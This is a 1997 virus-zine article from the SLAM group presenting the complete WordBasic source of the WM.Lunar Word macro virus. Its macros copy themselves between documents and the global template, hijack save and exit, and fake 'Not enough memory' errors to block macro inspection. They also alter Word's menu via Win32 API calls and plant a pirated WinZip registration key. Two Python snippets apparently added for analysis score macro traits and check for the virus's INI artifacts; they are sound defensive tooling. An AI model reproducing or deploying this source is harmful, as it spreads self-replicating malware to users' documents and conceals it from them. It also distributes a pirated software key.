
SLAM3.016: Lunar Word Macro Virus by Hyperlock [SLAM]

Published in Slam

Lunar Word Macro Virus

by Hyperlock [SLAM]


Identification:

  • VIRUSNAME: WM.Lunar.a
  • SIZE: 17,920 Bytes (8 Macros)
  • VERSION: v1.00
  • ORIGIN: United Kingdom
  • AUTHOR: Hyperlock
  • DATE: June, 1997

Characteristics:

  • Polymorphism: No
  • Stealth: Disables all normal methods of macro deletion
  • Encrypted: Yes
  • Retro: No
  • External Infection: No
  • Other Properties: Auto-Registration of WinZip
  • Word Version: 32-bit versions only (API calls)

VIRUS DESCRIPTION

This virus makes extensive use of the API, in particular user32.exe, to perform some otherwise impossible tasks. I have had it with messing about with Word's crappy built-in functions, and there is rarely anything interesting worth searching for that may be of any use and even if there are, they don't fuckin' work properly.

Being a lazy bastard, I have disabled most calls for macro viewing by just displaying a message box and not processing the request. I would have put some decent stealth on it, but am still fuckin' writing it. When finished, it will be an extension of Virtual Boy's add-in stealth method (nice one VB!), but should work a bit better and stops Word complaining about invalid add-ins when loading. I am still working on a tunnelling virus for Excel and it is a 7-level tunneller at the moment! Getting better.

Anyway, back to business. Like I said, I have used basic stealth, but it works and will just annoy the fuck out of anyone without a brain. So, macros FileTemplates and ToolsMacro are both disabled. Its propagation is quite robust, and is based loosely on the method of the Hyper virus (still not detected by virus scanners, and in case you wondered AV people, IT IS IN THE FUCKIN' WILD NOW!!! I.E., MORE THAN TWO COMPANIES).

The interesting bit is the use of the API to change Word's system menu. Any option can be altered, but in the case of the Lunar virus, it changes the Close option to SLAM and disables the option. You will also notice it disables the Close button as well, which isn't fuckin' surprising as it is the same ID. This now forces the use of FileExit to exit Word and it just so happens that I have made FileExit the payload. Well, fuck me if that was a coincidence!

The payload is non-destructive to data, and even does some good from the user's point of view. The payload automatically registers WinZip 6.x (the current and future versions that support current registration details) to be 'SLAM Virus Team'. If a registration already exists then it leaves it. This removes the annoying start-up dialog box so it is good from that point of view.

So, to summarise, here are the virus's macros:

  • AutoExec
  • AutoOpen
  • AutoClose
  • FileExit
  • FileSaveAs
  • FileSave
  • FileTemplates
  • ToolsMacro

And lastly, in case YOU CAN'T BE FUCKIN' BOTHERED LOOKING AT THE CODE, here is the official 'SLAM Virus Team' WinZip registration name and code:

  • Name: SLAM Virus Team
  • SN: 47036847

If you are a lazy bastard, you can let this virus register it for you <<laugh>>.

Hyperlock [SLAM]
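
From the analyst's side, the traits described above (auto-macros, copies to and from the global template, API declares, and ToolsMacro/FileTemplates replaced by a message box) can be scored from a macro listing. This is an added example, not code from the original article; it assumes the macro source has already been extracted and decoded into a name-to-text mapping, and the function names and trait labels are hypothetical.

```python
import re

AUTO = {"autoexec", "autoopen", "autoclose"}
SAVE_HOOKS = {"filesave", "filesaveas", "fileexit"}
UI_GUARDS = {"toolsmacro", "filetemplates"}  # dialogs used to list or delete macros
MACROCOPY = re.compile(r'^\s*MacroCopy\b.*"global:', re.I | re.M)
DECLARE = re.compile(r'^\s*Declare\s+(?:Function|Sub)\s+\w+\s+Lib\s+"[^"]+"',
                     re.I | re.M)

def is_stub(src):
    """True when the macro body does nothing except call MsgBox."""
    lines = [l.strip() for l in src.splitlines() if l.strip()]
    body = [l for l in lines
            if not re.match(r"rem\b", l, re.I)
            and l.lower() not in ("sub main", "end sub")]
    return bool(body) and all(l.lower().startswith("msgbox") for l in body)

def triage(macros):
    """macros: {macro name: source text}. Returns a sorted list of trait labels."""
    names = {n.lower() for n in macros}
    traits = set()
    if names & AUTO:
        traits.add("auto-macro")
    if names & SAVE_HOOKS:
        traits.add("save/exit hook")
    for name, src in macros.items():
        if MACROCOPY.search(src):
            traits.add("template-copy")      # copies to or from global:
        if DECLARE.search(src):
            traits.add("win32-api")
        if name.lower() in UI_GUARDS and is_stub(src):
            traits.add("macro-ui-blocked")   # user cannot open the macro dialog
    return sorted(traits)

# Constructed sample: a few lines per macro, shaped like the listing on this page.
SAMPLE = {
    "AutoOpen": 'Declare Function GetFocus Lib "User32"() As Integer\n'
                'Sub MAIN\nMacroCopy ct$ + ":autoopen", "global:autoopen", 1\nEnd Sub\n',
    "FileSave": 'Sub MAIN\nMacroCopy "global:filesave", ct$ + ":filesave", 1\n'
                'FileSave\nEnd Sub\n',
    "ToolsMacro": 'REM stub\nSub MAIN\nMsgBox("Not enough memory to perform this '
                  'operation", "Microsoft Word", 48)\nEnd Sub\n',
}
BENIGN = {"InsertDate": "Sub MAIN\nInsertDateTime\nEnd Sub\n"}

if __name__ == "__main__":
    print(triage(SAMPLE))
```
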

VIRUS CODE

---------------------------------------------------------------------------------------- 

REM
REM WM.Lunar virus
REM AutoExec macro
REM

Declare Function FindWindowA Lib "User32"(lpClassName$, lpWindowName As Long) As Integer

Declare Function GetFocus Lib "User32"() As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer

Declare Function ModifyMenuA Lib "User32"(hMenu As Integer, nPosition As Integer, wFlags As Integer, wIDNewItem As Integer, lpString$) As Integer

Declare Function GetMenuItemID Lib "User32"(hMenu As Integer, nPos As Integer) As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer



Sub MAIN
On Error Goto endsub

x = AlterMenu("SLAM", 6, 1)

endsub:
End Sub


Function AlterMenu(item$, item, flag)

hWnd = FindWindowA("OPUSAPP", 0)
hmenu = getsystemmenu(hwnd, 0)
hItem = getmenuitemid(hMenu, item)
AlterMenu = ModifyMenuA(hmenu, hitem, flag, - 10, item$)

End Function


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM Autoopen macro
REM

Declare Function FindWindowA Lib "User32"(lpClassName$, lpWindowName As Long) As Integer

Declare Function GetFocus Lib "User32"() As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer

Declare Function ModifyMenuA Lib "User32"(hMenu As Integer, nPosition As Integer, wFlags As Integer, wIDNewItem As Integer, lpString$) As Integer

Declare Function GetMenuItemID Lib "User32"(hMenu As Integer, nPos As Integer) As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer


Sub MAIN
On Error Goto endsub

x = AlterMenu("SLAM", 6, 1)

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0

ct$ = FileName$()
MacroCopy ct$ + ":autoexec", "global:autoexec", 1
MacroCopy ct$ + ":autoclose", "global:autoclose", 1
MacroCopy ct$ + ":autoopen", "global:autoopen", 1
MacroCopy ct$ + ":filesaveas", "global:filesaveas", 1
MacroCopy ct$ + ":filesave", "global:filesave", 1
MacroCopy ct$ + ":toolsmacro", "global:toolsmacro", 1
MacroCopy ct$ + ":filetemplates", "global:filetemplates", 1
profupdate

endsub:
End Sub



Sub profupdate

entry$ = GetPrivateProfileString$("virus", "lunar", "lunar.ini")

If entry$ = "" Then
SetPrivateProfileString("virus", "lunar", "1", "lunar.ini")
SetPrivateProfileString("virus", "author", "Hyperlock", "lunar.ini")

Else
a = Val(entry$) + 1
entry$ = Str$(a)
SetPrivateProfileString("virus", "lunar", entry$, "lunar.ini")
End If

End Sub



Function AlterMenu(item$, item, flag)

hWnd = FindWindowA("OPUSAPP", 0)
hmenu = getsystemmenu(hwnd, 0)
hItem = getmenuitemid(hMenu, item)
AlterMenu = ModifyMenuA(hmenu, hitem, flag, - 10, item$)

End Function


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM Autoclose macro
REM

Sub MAIN
On Error Goto endsub

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0

REM copy macros
ct$ = FileName$()
MacroCopy ct$ + ":autoexec", "global:autoexec", 1
MacroCopy ct$ + ":autoclose", "global:autoclose", 1
MacroCopy ct$ + ":autoopen", "global:autoopen", 1
MacroCopy ct$ + ":filesaveas", "global:filesaveas", 1
MacroCopy ct$ + ":filesave", "global:filesave", 1
MacroCopy ct$ + ":toolsmacro", "global:toolsmacro", 1
MacroCopy ct$ + ":filetemplates", "global:filetemplates", 1
autoopen.profupdate

endsub:
End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileExit macro (Payload)
REM

Sub MAIN
On Error Goto endsub

name$ = GetProfileString$("WinZip", "Name")
sn$ = GetProfileString$("WinZip", "SN")

If name$ = "" Then
SetProfileString("Winzip", "Name", "SLAM Virus Team")
SetProfileString("Winzip", "SN", "47036847")
End If

endsub:
FileExit
End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileSaveAs Macro
REM


Sub MAIN
On Error Goto endsub

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
DisableAutoMacros 0
SetDocumentDirty

Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
dlg.Format = 1

ct$ = FileName$()

MacroCopy "global:autoexec", ct$ + ":autoexec", 1
MacroCopy "global:autoclose", ct$ + ":autoclose", 1
MacroCopy "global:autoopen", ct$ + ":autoopen", 1
MacroCopy "global:filesaveas", ct$ + ":filesaveas", 1
MacroCopy "global:filesave", ct$ + ":filesave", 1
MacroCopy "global:toolsmacro", ct$ + ":toolsmacro", 1
MacroCopy "global:filetemplates", ct$ + ":filetemplates", 1
autoopen.profupdate

FileSaveAs dlg

REM bypass the if statement below
Err = 102

endsub:
If Err <> 102 Then
FileSaveAs dlg
End If

End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileSave macro
REM

Sub MAIN
On Error Goto endsub
REM stops error 24 when macros already exist

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
DisableAutoMacros 0
SetDocumentDirty

REM Force document to be a template (change to template and save)
Dim dlg As FileSaveAs
GetCurValues dlg
dlg.Format = 1
FileSaveAs dlg

ct$ = FileName$()
MacroCopy "global:autoexec", ct$ + ":autoexec", 1
MacroCopy "global:autoclose", ct$ + ":autoclose", 1
MacroCopy "global:autoopen", ct$ + ":autoopen", 1
MacroCopy "global:filesaveas", ct$ + ":filesaveas", 1
MacroCopy "global:filesave", ct$ + ":filesave", 1
MacroCopy "global:toolsmacro", ct$ + ":toolsmacro", 1
MacroCopy "global:filetemplates", ct$ + ":filetemplates", 1
autoopen.profupdate

FileSave

REM bypass the if statement below
Err = 102

endsub:
If Err <> 102 Then
FileSave
End If

End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileTemplates macro
REM

Sub MAIN

MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48)

End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM ToolsMacro macro
REM

Sub MAIN

MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48)

End Sub


----------------------------------------------------------------------------------------


HL [SLAM]
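
The profupdate and FileExit macros above leave two traces on a host: a counter in lunar.ini and a fixed WinZip registration. The following check for both is an added example, not part of the original article; it assumes the profile calls land in lunar.ini and win.ini in the Windows directory, takes the file contents as strings, and uses hypothetical function names.

```python
import configparser

# Strings taken from the profupdate and FileExit macros on this page.
REG_NAME, REG_SN = "SLAM Virus Team", "47036847"

def parse_ini(text):
    """Parse INI text as the Windows profile APIs read it: case-insensitive."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}                      # unreadable content: report nothing
    merged = {}
    for section in cp.sections():      # fold [WinZip] and [Winzip] together
        merged.setdefault(section.lower(), {}).update(cp[section])
    return merged

def lunar_artifacts(lunar_ini=None, win_ini=None):
    """Return findings for the two files' contents (None means file absent)."""
    findings = []
    if lunar_ini is not None:
        virus = parse_ini(lunar_ini).get("virus", {})
        if "lunar" in virus:
            # profupdate increments this on every macro-copy pass
            findings.append(f"lunar.ini counter = {virus['lunar']}")
        if (virus.get("author") or "").lower() == "hyperlock":
            findings.append("lunar.ini author marker")
    if win_ini is not None:
        winzip = parse_ini(win_ini).get("winzip", {})
        if winzip.get("name") == REG_NAME and winzip.get("sn") == REG_SN:
            findings.append("WinZip registration written by FileExit payload")
    return findings

# Constructed sample contents, not captured from a real host.
SAMPLE_LUNAR = "[virus]\nlunar= 3\nauthor=Hyperlock\n"
SAMPLE_WIN = "[windows]\nload=\n[Winzip]\nName=SLAM Virus Team\nSN=47036847\n"
CLEAN_WIN = "[windows]\nload=\n[WinZip]\nName=Jane Example\nSN=00000000\n"

if __name__ == "__main__":
    for finding in lunar_artifacts(SAMPLE_LUNAR, SAMPLE_WIN):
        print("FOUND:", finding)
```

An existing WinZip registration is left alone by the payload, so a clean [WinZip] entry does not rule out infection; the lunar.ini counter is the more reliable of the two traces.
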
